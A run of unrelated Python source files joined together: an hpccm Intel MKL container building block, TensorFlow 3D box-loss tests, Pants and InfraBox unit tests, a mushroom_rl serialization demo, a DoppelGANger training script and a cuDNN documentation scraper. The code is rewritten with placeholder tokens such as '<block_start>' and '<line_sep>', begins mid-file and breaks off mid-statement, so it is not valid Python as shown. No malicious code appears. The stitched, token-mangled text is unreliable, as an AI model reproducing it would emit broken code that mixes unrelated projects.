self.__instructions()<block_end><def_stmt>__instructions self<block_start>"""Fill in container instructions"""<line_sep>self<augadd>comment('MKL version {}'.format(self.__version))<if_stmt>self.__ospackages<block_start>self<augadd>packages(ospackages=self.__ospackages)<block_end><if_stmt><not>self.__eula<block_start><raise>RuntimeError('Intel EULA was not accepted. To accept, see the documentation for this building block')<block_end>self<augadd>packages(apt_keys=['https://apt.repos.intel.com/intel-gpg-keys/GPG-PUB-KEY-INTEL-SW-PRODUCTS-{}.PUB'.format(self.__year)] apt_repositories=['deb https://apt.repos.intel.com/mkl all main'] ospackages=['intel-mkl-64bit-{}'.format(self.__version)] yum_keys=['https://yum.repos.intel.com/intel-gpg-keys/GPG-PUB-KEY-INTEL-SW-PRODUCTS-{}.PUB'.format(self.__year)] yum_repositories=['https://yum.repos.intel.com/mkl/setup/intel-mkl.repo'])<line_sep># Set the environment <if_stmt>self.__mklvars# Source the mklvars environment script when starting the # container, but the variables not be available for any # subsequent build steps. <block_start>self<augadd>shell(commands=['echo "source /opt/intel/mkl/bin/mklvars.sh intel64" >> {}'.format(self.__bashrc)])<block_end><else_stmt># Set the environment so that it will be available to # subsequent build steps and when starting the container, # but this may miss some things relative to the mklvars # environment script. <block_start>self.environment_variables={'CPATH':'/opt/intel/mkl/include:$CPATH' 'LD_LIBRARY_PATH':'/opt/intel/mkl/lib/intel64:/opt/intel/lib/intel64:$LD_LIBRARY_PATH' 'LIBRARY_PATH':'/opt/intel/mkl/lib/intel64:/opt/intel/lib/intel64:$LIBRARY_PATH' 'MKLROOT':'/opt/intel/mkl'}<line_sep>self<augadd>environment(variables=self.environment_step())<block_end><block_end><def_stmt>__distro self<block_start>"""Based on the Linux distribution, set values accordingly. A user specified value overrides any defaults."""<if_stmt>hpccm.config.g_linux_distro<eq>linux_distro.UBUNTU<block_start><if_stmt><not>self.__ospackages<block_start>self.__ospackages=['apt-transport-https' 'ca-certificates' 'gnupg' 'wget']<block_end>self.__bashrc='/etc/bash.bashrc'<block_end><elif_stmt>hpccm.config.g_linux_distro<eq>linux_distro.CENTOS<block_start><if_stmt><not>self.__ospackages<block_start>self.__ospackages=[]<block_end>self.__bashrc='/etc/bashrc'<block_end><else_stmt># pragma: no cover <block_start><raise>RuntimeError('Unknown Linux distribution')<block_end><block_end><def_stmt>runtime self _from='0'<block_start>"""Generate the set of instructions to install the runtime specific components from a build in a previous stage. # Examples ```python m = mkl(...) Stage0 += m Stage1 += m.runtime() ``` """<line_sep><return>str(self)<block_end><block_end>
# coding=utf-8 # Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for ...tf3d.losses.box_prediction_losses."""<import_stmt>tensorflow<as>tf<import_from_stmt>tf3d standard_fields<import_from_stmt>tf3d.losses box_prediction_losses<class_stmt>BoxPredictionLossesTest(tf.test.TestCase)<block_start><def_stmt>_get_random_inputs self<block_start><return>{standard_fields.InputDataFields.object_rotation_matrix_voxels:tf.random.uniform([1 100 3 3] minval=-1.0 maxval=1.0 dtype=tf.float32) standard_fields.InputDataFields.object_length_voxels:tf.random.uniform([1 100 1] minval=0.1 maxval=2.0 dtype=tf.float32) standard_fields.InputDataFields.object_height_voxels:tf.random.uniform([1 100 1] minval=0.1 maxval=2.0 dtype=tf.float32) standard_fields.InputDataFields.object_width_voxels:tf.random.uniform([1 100 1] minval=0.1 maxval=2.0 dtype=tf.float32) standard_fields.InputDataFields.object_center_voxels:tf.random.uniform([1 100 3] minval=-5.0 maxval=5.0 dtype=tf.float32) standard_fields.InputDataFields.object_class_voxels:tf.random.uniform([1 100 1] minval=0 maxval=7 dtype=tf.int32) standard_fields.InputDataFields.object_instance_id_voxels:tf.random.uniform([1 100 1] minval=0 maxval=20 dtype=tf.int32) }<block_end><def_stmt>_get_empty_inputs self<block_start>inputs=self._get_random_inputs()<for_stmt>key inputs<block_start><if_stmt>key<in>inputs<block_start>tensor_shape=inputs[key].shape.as_list()<line_sep>tensor_shape[1]=0<line_sep>inputs[key]=tf.zeros(tensor_shape dtype=inputs[key].dtype)<block_end><block_end>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([0] dtype=tf.int32)<line_sep><return>inputs<block_end><def_stmt>_get_dictionaries_for_distance_loss_relative self<block_start>gt_box_center=tf.reshape(tf.constant([10.0 -20.0 30.0] dtype=tf.float32) [1 1 3])<line_sep>gt_box_length=tf.reshape(tf.constant([1.0] dtype=tf.float32) [1 1 1])<line_sep>gt_box_height=tf.reshape(tf.constant([2.0] dtype=tf.float32) [1 1 1])<line_sep>gt_box_width=tf.reshape(tf.constant([3.0] dtype=tf.float32) [1 1 1])<line_sep>gt_box_r=tf.reshape(tf.eye(3 dtype=tf.float32) [1 1 3 3])<line_sep>gt_box_class=tf.reshape(tf.constant([1] dtype=tf.int32) [1 1 1])<line_sep>gt_instance_ids=tf.reshape(tf.constant([1] dtype=tf.int32) [1 1 1])<line_sep>pred_box_center1=tf.reshape(tf.constant([10.1 -20.1 30.1] dtype=tf.float32) [1 1 3])<line_sep>pred_box_length1=tf.reshape(tf.constant([1.1] dtype=tf.float32) [1 1 1])<line_sep>pred_box_height1=tf.reshape(tf.constant([2.1] dtype=tf.float32) [1 1 1])<line_sep>pred_box_width1=tf.reshape(tf.constant([3.1] dtype=tf.float32) [1 1 1])<line_sep>pred_box_r1=tf.reshape(tf.eye(3 dtype=tf.float32) [1 1 3 3])<line_sep>pred_box_center2=tf.reshape(tf.constant([10.1 -20.2 30.2] dtype=tf.float32) [1 1 3])<line_sep>pred_box_length2=tf.reshape(tf.constant([1.11] dtype=tf.float32) [1 1 1])<line_sep>pred_box_height2=tf.reshape(tf.constant([2.11] dtype=tf.float32) [1 1 1])<line_sep>pred_box_width2=tf.reshape(tf.constant([3.11] dtype=tf.float32) [1 1 1])<line_sep>pred_box_r2=tf.reshape(tf.eye(3 dtype=tf.float32) [1 1 3 3])<line_sep>inputs={standard_fields.InputDataFields.object_rotation_matrix_voxels:gt_box_r standard_fields.InputDataFields.object_length_voxels:gt_box_length standard_fields.InputDataFields.object_height_voxels:gt_box_height standard_fields.InputDataFields.object_width_voxels:gt_box_width standard_fields.InputDataFields.object_center_voxels:gt_box_center standard_fields.InputDataFields.object_class_voxels:gt_box_class standard_fields.InputDataFields.object_instance_id_voxels:gt_instance_ids }<line_sep>outputs1={standard_fields.DetectionResultFields.object_rotation_matrix_voxels:pred_box_r1 standard_fields.DetectionResultFields.object_length_voxels:pred_box_length1 standard_fields.DetectionResultFields.object_height_voxels:pred_box_height1 standard_fields.DetectionResultFields.object_width_voxels:pred_box_width1 standard_fields.DetectionResultFields.object_center_voxels:pred_box_center1 }<line_sep>outputs2={standard_fields.DetectionResultFields.object_rotation_matrix_voxels:pred_box_r2 standard_fields.DetectionResultFields.object_length_voxels:pred_box_length2 standard_fields.DetectionResultFields.object_height_voxels:pred_box_height2 standard_fields.DetectionResultFields.object_width_voxels:pred_box_width2 standard_fields.DetectionResultFields.object_center_voxels:pred_box_center2 }<line_sep><return>inputs outputs1 outputs2<block_end><def_stmt>test_box_size_regression_loss_on_voxel_tensors_empty_inputs self<block_start>inputs=self._get_empty_inputs()<line_sep>outputs={standard_fields.DetectionResultFields.object_length_voxels:tf.zeros([1 0 3] dtype=tf.float32) standard_fields.DetectionResultFields.object_height_voxels:tf.zeros([1 0 3] dtype=tf.float32) standard_fields.DetectionResultFields.object_width_voxels:tf.zeros([1 0 3] dtype=tf.float32) }<line_sep>loss=box_prediction_losses.box_size_regression_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_size_regression_loss_on_voxel_tensors_correct_prediction self<block_start>inputs=self._get_random_inputs()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([100] dtype=tf.int32)<line_sep>outputs={standard_fields.DetectionResultFields.object_length_voxels:inputs[standard_fields.InputDataFields.object_length_voxels] standard_fields.DetectionResultFields.object_height_voxels:inputs[standard_fields.InputDataFields.object_height_voxels] standard_fields.DetectionResultFields.object_width_voxels:inputs[standard_fields.InputDataFields.object_width_voxels] }<line_sep>loss=box_prediction_losses.box_size_regression_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_size_regression_loss_on_voxel_tensors_relative self<block_start>(inputs outputs1 outputs2)=self._get_dictionaries_for_distance_loss_relative()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([1] dtype=tf.int32)<line_sep>loss1=box_prediction_losses.box_size_regression_loss_on_voxel_tensors(inputs=inputs outputs=outputs1 loss_type='huber')<line_sep>loss2=box_prediction_losses.box_size_regression_loss_on_voxel_tensors(inputs=inputs outputs=outputs2 loss_type='huber')<line_sep>self.assertGreater(loss2.numpy() loss1.numpy())<block_end><def_stmt>test_box_center_distance_loss_on_voxel_tensors_empty_inputs self<block_start>inputs=self._get_empty_inputs()<line_sep>outputs={standard_fields.DetectionResultFields.object_center_voxels:tf.zeros([1 0 3] dtype=tf.float32) }<line_sep>loss=box_prediction_losses.box_center_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_center_distance_loss_on_voxel_tensors_correct_prediction self<block_start>inputs=self._get_random_inputs()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([100] dtype=tf.int32)<line_sep>outputs={standard_fields.DetectionResultFields.object_center_voxels:inputs[standard_fields.InputDataFields.object_center_voxels] }<line_sep>loss=box_prediction_losses.box_center_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_center_distance_loss_on_voxel_tensors_relative self<block_start>(inputs outputs1 outputs2)=self._get_dictionaries_for_distance_loss_relative()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([1] dtype=tf.int32)<line_sep>loss1=box_prediction_losses.box_center_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs1 loss_type='huber')<line_sep>loss2=box_prediction_losses.box_center_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs2 loss_type='huber')<line_sep>self.assertGreater(loss2.numpy() loss1.numpy())<block_end><def_stmt>test_box_corner_distance_loss_on_voxel_tensors_empty_inputs self<block_start>inputs=self._get_empty_inputs()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([0] dtype=tf.int32)<line_sep>outputs={standard_fields.DetectionResultFields.object_rotation_matrix_voxels:tf.zeros([1 0 3 3] dtype=tf.float32) standard_fields.DetectionResultFields.object_length_voxels:tf.zeros([1 0 1] dtype=tf.float32) standard_fields.DetectionResultFields.object_height_voxels:tf.zeros([1 0 1] dtype=tf.float32) standard_fields.DetectionResultFields.object_width_voxels:tf.zeros([1 0 1] dtype=tf.float32) standard_fields.DetectionResultFields.object_center_voxels:tf.zeros([1 0 3] dtype=tf.float32) }<line_sep>loss=box_prediction_losses.box_corner_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='normalized_huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_corner_distance_loss_on_voxel_tensors_correct_prediction self<block_start>inputs=self._get_random_inputs()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([100] dtype=tf.int32)<line_sep>outputs={standard_fields.DetectionResultFields.object_rotation_matrix_voxels:inputs[standard_fields.InputDataFields.object_rotation_matrix_voxels] standard_fields.DetectionResultFields.object_length_voxels:inputs[standard_fields.InputDataFields.object_length_voxels] standard_fields.DetectionResultFields.object_height_voxels:inputs[standard_fields.InputDataFields.object_height_voxels] standard_fields.DetectionResultFields.object_width_voxels:inputs[standard_fields.InputDataFields.object_width_voxels] standard_fields.DetectionResultFields.object_center_voxels:inputs[standard_fields.InputDataFields.object_center_voxels] }<line_sep>loss=box_prediction_losses.box_corner_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs loss_type='normalized_huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_corner_distance_loss_on_voxel_tensors_relative self<block_start>(inputs outputs1 outputs2)=self._get_dictionaries_for_distance_loss_relative()<line_sep>inputs[standard_fields.InputDataFields.num_valid_voxels]=tf.constant([1] dtype=tf.int32)<line_sep>loss1=box_prediction_losses.box_corner_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs1 loss_type='normalized_huber')<line_sep>loss2=box_prediction_losses.box_corner_distance_loss_on_voxel_tensors(inputs=inputs outputs=outputs2 loss_type='normalized_huber')<line_sep>self.assertGreater(loss2.numpy() loss1.numpy())<block_end><def_stmt>test_box_corner_distance_loss_on_object_tensors_correct_prediction self<block_start>voxel_inputs=self._get_random_inputs()<line_sep>inputs={}<for_stmt>key,value standard_fields.get_input_voxel_to_object_field_mapping().items()<block_start><if_stmt>key<in>voxel_inputs<block_start>inputs[value]=[voxel_inputs[key][0 Ellipsis]]<block_end><block_end>outputs={standard_fields.DetectionResultFields.objects_rotation_matrix:inputs[standard_fields.InputDataFields.objects_rotation_matrix] standard_fields.DetectionResultFields.objects_length:inputs[standard_fields.InputDataFields.objects_length] standard_fields.DetectionResultFields.objects_height:inputs[standard_fields.InputDataFields.objects_height] standard_fields.DetectionResultFields.objects_width:inputs[standard_fields.InputDataFields.objects_width] standard_fields.DetectionResultFields.objects_center:inputs[standard_fields.InputDataFields.objects_center] }<line_sep>loss=box_prediction_losses.box_corner_distance_loss_on_object_tensors(inputs=inputs outputs=outputs loss_type='normalized_huber')<line_sep>self.assertAllClose(loss.numpy() 0.0)<block_end><def_stmt>test_box_corner_distance_loss_on_object_tensors_relative self<block_start>(voxel_inputs voxel_outputs1 voxel_outputs2)=self._get_dictionaries_for_distance_loss_relative()<line_sep>inputs={}<line_sep>outputs1={}<line_sep>outputs2={}<for_stmt>key,value standard_fields.get_input_voxel_to_object_field_mapping().items()<block_start><if_stmt>key<in>voxel_inputs<block_start>inputs[value]=[voxel_inputs[key][0 Ellipsis]]<block_end><block_end><for_stmt>key,value standard_fields.get_output_voxel_to_object_field_mapping().items()<block_start><if_stmt>key<in>voxel_outputs1<block_start>outputs1[value]=[voxel_outputs1[key][0 Ellipsis]]<block_end><block_end><for_stmt>key,value standard_fields.get_output_voxel_to_object_field_mapping().items()<block_start><if_stmt>key<in>voxel_outputs2<block_start>outputs2[value]=[voxel_outputs2[key][0 Ellipsis]]<block_end><block_end>loss1=box_prediction_losses.box_corner_distance_loss_on_object_tensors(inputs=inputs outputs=outputs1 loss_type='normalized_huber')<line_sep>loss2=box_prediction_losses.box_corner_distance_loss_on_object_tensors(inputs=inputs outputs=outputs2 loss_type='normalized_huber')<line_sep>self.assertGreater(loss2.numpy() loss1.numpy())<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.test.main()<block_end>
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). <import_from_future_stmt> annotations<import_stmt>hashlib<import_stmt>pytest<import_from_stmt>pants.engine.fs EMPTY_FILE_DIGEST CreateDigest Digest FileContent FileDigest<import_from_stmt>pants.jvm.util_rules ExtractFileDigest<import_from_stmt>pants.jvm.util_rules rules<as>util_rules<import_from_stmt>pants.testutil.rule_runner QueryRule RuleRunner<line_sep>@pytest.fixture<def_stmt>rule_runner <arrow>RuleRunner<block_start><return>RuleRunner(preserve_tmpdirs=<true> rules=[*util_rules() QueryRule(FileDigest (ExtractFileDigest )) ] )<block_end><def_stmt>get_digest rule_runner:RuleRunner source_files:dict[str str]<arrow>Digest<block_start>files=[FileContent(path content.encode())<for>path,content source_files.items()]<line_sep><return>rule_runner.request(Digest [CreateDigest(files)])<block_end><def_stmt>test_extract_empty_file rule_runner:RuleRunner<arrow><none><block_start>digest=get_digest(rule_runner {"foo.txt":""})<line_sep>file_digest=rule_runner.request(FileDigest [ExtractFileDigest(digest=digest file_path="foo.txt")] )<assert_stmt>file_digest<eq>EMPTY_FILE_DIGEST<block_end><def_stmt>test_extract_nonempty_file rule_runner:RuleRunner<arrow><none><block_start>digest=get_digest(rule_runner {"foo.txt":"bar"})<line_sep>file_digest=rule_runner.request(FileDigest [ExtractFileDigest(digest=digest file_path="foo.txt")] )<line_sep>hasher=hashlib.sha256()<line_sep>hasher.update(b"bar")<assert_stmt>file_digest<eq>FileDigest(fingerprint=hasher.hexdigest() serialized_bytes_length=3)<block_end><def_stmt>test_extract_missing_file rule_runner:RuleRunner<arrow><none><block_start>digest=get_digest(rule_runner {"foo.txt":""})<with_stmt>pytest.raises(Exception match=r".*?not found in.*?")<block_start>rule_runner.request(FileDigest [ExtractFileDigest(digest=digest file_path="missing")] )<block_end><block_end><def_stmt>test_subset_with_multiple_files rule_runner:RuleRunner<arrow><none><block_start>digest=get_digest(rule_runner {"foo.txt":"" "bar.txt":""})<with_stmt>pytest.raises(Exception match=r".*?found multiple times.*?")<block_start>rule_runner.request(FileDigest [ExtractFileDigest(digest=digest file_path="*")] )<block_end><block_end>
# -*- Mode: Python -*- # vi:si:et:sw=4:sts=4:ts=4 ''' Tests related to modules. '''<import_stmt>unittest<import_stmt>common<class_stmt>SameModuleNameTestCase(common.TestCase)<block_start>''' Test that modules with the same name do not shadow eachother. '''<def_stmt>test_getmodule self<block_start>self.checkMultiple('test_getmodule' ['getmodule/A/C.py' 'getmodule/B/C.py' ])<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_from_stmt>mushroom_rl.core Serializable<import_stmt>torch<import_stmt>numpy<as>np<import_from_stmt>mushroom_rl.utils.parameters Parameter<class_stmt>TestClass(Serializable)<block_start><def_stmt>__init__ self value# Create some different types of variables <block_start>self._primitive_variable=value# Primitive python variable self._numpy_vector=np.array([1 2 3]<times>value)# Numpy array self._dictionary=dict(some='random' keywords=2 fill='the dictionary')# A dictionary # Building a torch object data_array=np.ones(3)<times>value<line_sep>data_tensor=torch.from_numpy(data_array)<line_sep>self._torch_object=torch.nn.Parameter(data_tensor)<line_sep># Some variables that implement the Serializable interface self._mushroom_parameter=Parameter(2.0<times>value)<line_sep>self._list_of_objects=[Parameter(i)<for>i range(value)]# This is a list! # A variable that is not important e.g. a buffer self.not_important=np.zeros(10000)<line_sep># A variable that contains a reference to another variable self._list_reference=[self._dictionary]<line_sep># Superclass constructor super().__init__()<line_sep># Here we specify how to save each component self._add_save_attr(_primitive_variable='primitive' _numpy_vector='numpy' _dictionary='pickle' _torch_object='torch' _mushroom_parameter='mushroom' # List of mushroom objects can also be saved with the 'mushroom' mode _list_of_objects='mushroom' # The '!' is to specify that we save the variable only if full_save is True not_important='numpy!' )<block_end><def_stmt>_post_load self<block_start><if_stmt>self.not_important<is><none><block_start>self.not_important=np.zeros(10000)<block_end>self._list_reference=[self._dictionary]<block_end><block_end><def_stmt>print_variables obj<block_start><for_stmt>label,var vars(obj).items()<block_start><if_stmt>label<ne>'_save_attributes'<block_start><if_stmt>isinstance(var Parameter)<block_start>print(f'{label}: Parameter({var()})')<block_end><elif_stmt>isinstance(var list)<and>isinstance(var[0] Parameter)<block_start>new_list=[f'Parameter({item()})'<for>item var]<line_sep>print(f'{label}: {new_list}')<block_end><else_stmt><block_start>print(label ': ' var)<block_end><block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'# Create test object and print its variables <block_start>test_object=TestClass(1)<line_sep>print('###########################################################################################################')<line_sep>print('The test object contains the following:')<line_sep>print('-----------------------------------------------------------------------------------------------------------')<line_sep>print_variables(test_object)<line_sep># Changing the buffer test_object.not_important[0]=1<line_sep># Save the object on disk test_object.save('test.msh')<line_sep># Create another test object test_object=TestClass(2)<line_sep>print('###########################################################################################################')<line_sep>print('After overwriting the test object:')<line_sep>print('-----------------------------------------------------------------------------------------------------------')<line_sep>print_variables(test_object)<line_sep># Changing the buffer again test_object.not_important[0]=1<line_sep># Save the other test object, this time remember buffer test_object.save('test_full.msh' full_save=<true>)<line_sep># Load first test object and print its variables print('###########################################################################################################')<line_sep>test_object=TestClass.load('test.msh')<line_sep>print('Loading previous test object:')<line_sep>print('-----------------------------------------------------------------------------------------------------------')<line_sep>print_variables(test_object)<line_sep># Load second test object and print its variables print('###########################################################################################################')<line_sep>test_object=TestClass.load('test_full.msh')<line_sep>print('Loading previous test object:')<line_sep>print('-----------------------------------------------------------------------------------------------------------')<line_sep>print_variables(test_object)<block_end>
<import_stmt>sys<line_sep>sys.path.append("..")<import_from_stmt>gan output<line_sep>sys.modules["output"]=output<import_from_stmt>gan.doppelganger DoppelGANger<import_from_stmt>gan.util add_gen_flag normalize_per_sample<import_from_stmt>gan.load_data load_data<import_from_stmt>gan.network DoppelGANgerGenerator Discriminator AttrDiscriminator<import_stmt>os<import_stmt>tensorflow<as>tf<if_stmt>__name__<eq>"__main__"<block_start>sample_len=10<line_sep>(data_feature data_attribute data_gen_flag data_feature_outputs data_attribute_outputs)=load_data("../data/web")<line_sep>print(data_feature.shape)<line_sep>print(data_attribute.shape)<line_sep>print(data_gen_flag.shape)<line_sep>(data_feature data_attribute data_attribute_outputs real_attribute_mask)=normalize_per_sample(data_feature data_attribute data_feature_outputs data_attribute_outputs)<line_sep>print(real_attribute_mask)<line_sep>print(data_feature.shape)<line_sep>print(data_attribute.shape)<line_sep>print(len(data_attribute_outputs))<line_sep>data_feature,data_feature_outputs=add_gen_flag(data_feature data_gen_flag data_feature_outputs sample_len)<line_sep>print(data_feature.shape)<line_sep>print(len(data_feature_outputs))<line_sep>generator=DoppelGANgerGenerator(feed_back=<false> noise=<true> feature_outputs=data_feature_outputs attribute_outputs=data_attribute_outputs real_attribute_mask=real_attribute_mask sample_len=sample_len)<line_sep>discriminator=Discriminator()<line_sep>attr_discriminator=AttrDiscriminator()<line_sep>checkpoint_dir="./test/checkpoint"<if_stmt><not>os.path.exists(checkpoint_dir)<block_start>os.makedirs(checkpoint_dir)<block_end>sample_dir="./test/sample"<if_stmt><not>os.path.exists(sample_dir)<block_start>os.makedirs(sample_dir)<block_end>time_path="./test/time.txt"<line_sep>epoch=400<line_sep>batch_size=100<line_sep>vis_freq=200<line_sep>vis_num_sample=5<line_sep>d_rounds=1<line_sep>g_rounds=1<line_sep>d_gp_coe=10.0<line_sep>attr_d_gp_coe=10.0<line_sep>g_attr_d_coe=1.0<line_sep>extra_checkpoint_freq=5<line_sep>num_packing=1<line_sep>run_config=tf.ConfigProto()<with_stmt>tf.Session(config=run_config)<as>sess<block_start>gan=DoppelGANger(sess=sess checkpoint_dir=checkpoint_dir sample_dir=sample_dir time_path=time_path epoch=epoch batch_size=batch_size data_feature=data_feature data_attribute=data_attribute real_attribute_mask=real_attribute_mask data_gen_flag=data_gen_flag sample_len=sample_len data_feature_outputs=data_feature_outputs data_attribute_outputs=data_attribute_outputs vis_freq=vis_freq vis_num_sample=vis_num_sample generator=generator discriminator=discriminator attr_discriminator=attr_discriminator d_gp_coe=d_gp_coe attr_d_gp_coe=attr_d_gp_coe g_attr_d_coe=g_attr_d_coe d_rounds=d_rounds g_rounds=g_rounds num_packing=num_packing extra_checkpoint_freq=extra_checkpoint_freq)<line_sep>gan.build()<line_sep>gan.train()<block_end><block_end>
<class_stmt>DoesNotExistException(Exception)<block_start><pass><block_end>
#! /usr/bin/env python <import_stmt>unittest<import_stmt>sys<import_stmt>xmlrunner<import_from_stmt>pyinfraboxutils.coverage *<class_stmt>TestCoverageMethods(unittest.TestCase)<block_start><def_stmt>test_jacoco self<block_start>parser=Parser("data/report_test.xml")<line_sep>parser.parse(<none> create_markup=<false>)<line_sep>self.assertTrue(parser.files[0].functions_found<eq>2)<line_sep>self.assertTrue(parser.files[0].functions_hit<eq>0)<line_sep>self.assertTrue(parser.files[0].branches_found<eq>2)<line_sep>self.assertTrue(parser.files[0].branches_hit<eq>0)<line_sep>self.assertTrue(parser.files[0].lines_hit<eq>0)<line_sep>self.assertTrue(parser.files[0].lines_found<eq>3)<line_sep>self.assertTrue(parser.files[0].name<eq>"HelloWorld.java")<block_end><def_stmt>test_parse_dir self<block_start>parser=Parser("data/")<line_sep>parser.parse(<none> create_markup=<false>)<line_sep>hello=0<line_sep>hello2=1<if_stmt>parser.files[0].name<eq>"HelloWorld2.java"<block_start>hello=1<line_sep>hello2=0<block_end>self.assertTrue(parser.files[hello].functions_found<eq>2<times>2)<line_sep>self.assertTrue(parser.files[hello].functions_hit<eq>0<times>2)<line_sep>self.assertTrue(parser.files[hello].branches_found<eq>2<times>2)<line_sep>self.assertTrue(parser.files[hello].branches_hit<eq>0<times>2)<line_sep>self.assertTrue(parser.files[hello].lines_hit<eq>0<times>2)<line_sep>self.assertTrue(parser.files[hello].lines_found<eq>3<times>2)<line_sep>self.assertTrue(parser.files[hello].name<eq>"HelloWorld.java")<line_sep>self.assertTrue(parser.files[hello2].functions_found<eq>2)<line_sep>self.assertTrue(parser.files[hello2].functions_hit<eq>0)<line_sep>self.assertTrue(parser.files[hello2].branches_found<eq>2)<line_sep>self.assertTrue(parser.files[hello2].branches_hit<eq>0)<line_sep>self.assertTrue(parser.files[hello2].lines_hit<eq>0)<line_sep>self.assertTrue(parser.files[hello2].lines_found<eq>3)<line_sep>self.assertTrue(parser.files[hello2].name<eq>"HelloWorld2.java")<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>s=unittest.defaultTestLoader.discover('.')<line_sep>r=xmlrunner.XMLTestRunner(output='/infrabox/upload/testresult/').run(s)<line_sep>sys.exit(<not>r.wasSuccessful())<block_end>
<import_from_stmt>bs4 BeautifulSoup<import_stmt>requests<import_stmt>re<import_stmt>sys<import_stmt>os<line_sep>inputs={}<line_sep>outputs={}<line_sep>ios={}<line_sep>docs={}<def_stmt>get <block_start><if_stmt>os.path.isfile("cache/docs.html")<block_start><with_stmt>open("cache/docs.html" 'r')<as>f<block_start>print("Using cache" file=sys.stderr)<line_sep><return>f.read()<block_end><block_end>r=requests.get("https://docs.nvidia.com/deeplearning/cudnn/api/index.html")<with_stmt>open("cache/docs.html" 'w')<as>f<block_start>f.write(r.text)<block_end><return>r.text<block_end><def_stmt>main <block_start>txt=get()<line_sep>soup=BeautifulSoup(txt "html5lib")<line_sep>contents=soup.find_all(id="contents")<line_sep>ids=["cudnn-ops-infer-so-library" "cudnn-ops-train-so-library" "cudnn-cnn-infer-so-library" "cudnn-cnn-train-so-library" "cudnn-adv-infer-so-library" "cudnn-adv-train-so-library" "cudnn-backend-api"]<line_sep>topics=[contents[0].find_all(id=i)[0].find_all(id=re.compile("-api"))<for>i ids]<line_sep>topics=[t.find_all(class_="topic concept nested2")<for>topic topics<for>t topic]<line_sep>topics=[t<for>ts topics<for>t ts]<line_sep>#print(topics[0]) <for_stmt>i,topic enumerate(topics)<block_start>rawFnName=topic.find_all(class_='title topictitle2')[0].text<line_sep>rawFnName=rawFnName.rstrip('()')<try_stmt><block_start>fnName=re.search('cudnn.+$' rawFnName).group(0)<block_end><except_stmt>AttributeError<as>e<block_start>print("rawFnName: {}".format(rawFnName) file=sys.stderr)<line_sep><continue><block_end><try_stmt><block_start>paramsDL=topic.find_all(class_='dl')[0]# first definition list is params <block_end><except_stmt>IndexError<block_start>print("rawFnName: {} - topic has no dl class".format(fnName) file=sys.stderr)<line_sep><continue><block_end>#print(paramsDL) # check previous #if paramsDL.previous_sibling.previous_sibling.text != "Parameters": # print("rawFnName: {} has no params::: {}".format(fnName, paramsDL.previous_sibling), file=sys.stderr) # continue params=paramsDL.find_all(class_='dt dlterm')# name paramsDesc=paramsDL.find_all(class_='dd')# use type paramUse=[]<for_stmt>d paramsDesc<block_start><try_stmt><block_start>use=d.find_all(class_='ph i')[0].text<block_end><except_stmt>IndexError<as>e<block_start>use="Input"<block_end>paramUse.append(use)<block_end><if_stmt>len(params)<ne>len(paramUse)<block_start>print("rawFnName: {} - differing params and use cases".format(fnName) file=sys.stderr)<line_sep><continue><block_end>inputParams=[p.text.strip()<for>i,p enumerate(params)<if>(paramUse[i].strip()<eq>'Input')<or>(paramUse[i].strip()<eq>"Inputs")]<line_sep>outputParams=[p.text.strip()<for>i,p enumerate(params)<if>(paramUse[i].strip()<eq>'Output')<or>(paramUse[i].strip()<eq>"Outputs")]<line_sep>ioParams=[p.text.strip()<for>i,p enumerate(params)<if>paramUse[i].strip()<eq>'Input/Output']<line_sep>inputs[fnName]=inputParams<line_sep>outputs[fnName]=outputParams<line_sep>ios[fnName]=ioParams<line_sep># extract docs <try_stmt><block_start>docbody=topic.find_all(class_='body conbody')[0]<block_end><except_stmt>IndexError<block_start>print("fnName: {} - no body".format(fnName) file=sys.stderr)<line_sep><continue><block_end># clear is better than clever. <try_stmt><block_start>doc=docbody.find_all("p")[0].text<block_end><except_stmt><block_start>print("fnName: {} - no p".format(fnName) file=sys.stderr)<line_sep><continue><block_end>doc=doc.replace("\n" "")<line_sep>doc=re.sub("\t+" " " doc)<line_sep>doc=re.sub("\s+" " " doc)<line_sep>doc=doc.replace('"' '`')<line_sep>doc=doc.replace("This function" fnName)<line_sep>doc=doc.replace("This routine" fnName)<line_sep>doc=doc.replace("This" fnName)<line_sep>doc=doc.strip()<line_sep>docs[fnName]=doc<block_end># write the go file print("package main")<line_sep>print("/* generated by parse.py. DO NOT EDIT */")<line_sep>print("var inputParams = 